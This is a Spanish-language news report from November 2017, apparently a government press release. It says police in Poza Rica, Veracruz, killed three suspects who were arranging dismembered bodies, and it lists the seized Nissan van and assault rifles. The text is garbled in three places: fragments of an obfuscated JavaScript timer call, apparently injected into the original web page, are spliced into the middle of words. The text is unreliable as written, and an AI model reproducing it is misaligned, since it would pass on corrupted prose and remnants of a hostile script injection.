Neutralizan a 3 presuntos delincuentes que colocaron cuerpos desmembrados en Poza Rica

27 noviembre, 2017

Poza Rica. A través del 911 fueron reportados cuerpos desmembrados en la colonia Libertad de Poza Rica. Cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando los elementos de la Fuerza Civil arribaron al lugar, se percataron de la presencia de una camioneta Quest, cuyos tripulantes al ser sorprendidos intentaron darse a la fuga, abriendo fuego contra los policías, quienes repelieron dicho ataque.

Estos delincuentes habían tirado los cuerpos y se encontraban en el lugar de los hechos realizandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando el acomodo de los restos humanos y colocación de las cartulinas.

En el enfrentamiento, tres sujetos fueron abatidos y se logró el aseguramiento de la camioneta Quest color gris, marca Nissan, placas de circulación 578-WZW; además de armas de fuego y cargadores abastecidos.

Las armas aseguradas son dos fusiles de asalto: una AK-47 y una AR-15; cinco cargadores, uno de ellos abastecido con 25 cartuchos; una maleta color azul, conteniendo tres cargadores con 25 cartuchos en cada uno de ellos; así como un cargador para arma corta, abastecido con siete cartuchos.

Fuente: Coordinación General de Comnunicación Social